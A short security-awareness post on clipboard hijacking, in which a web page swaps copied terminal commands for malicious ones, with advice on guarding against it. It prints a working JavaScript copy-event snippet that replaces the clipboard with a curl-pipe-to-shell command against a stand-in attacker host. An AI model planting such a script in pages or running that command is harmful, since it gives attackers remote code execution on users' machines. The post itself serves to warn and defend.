Get Hacked By Accidentally Copy Pasting

This is why you should NEVER copy paste commands directly into your terminal. Ask any developer or Admin if they have ever copied a command line or code snippet from the web. The answer would probably be YES. You would assume that what you copied is what you paste, right? Well, nope!

You think you are copying one thing, but it’s replaced with something else, like malicious code. All it takes is a single line of code injected into the code you copied to create a backdoor to your app.

This attack is very simple but also very harmful. Here is how it works:

Let’s say you were searching how to update your ubuntu, and you found this command line. And you copy it:

Try it — copy the command below:

sudo apt update

Now Paste it here:

Here is the issue: Did you see that it automatically added a new line. When this happens in a terminal it will automatically execute the command!

This is the javascript that is responsible for this:

<script>
document.getElementById(‘copy’).addEventListener(‘copy’, function(e) { e.clipboardData.setData(‘text/plain’, ‘curl http://attacker-domain:8000/shell.sh | sh\n’); e.preventDefault(); });
</script>

how to avoid this?

The safest way, is not to paste anything you copied from the web into your terminal. Also many terminals can be configured not to automatically execute when you paste a “\n” (new line)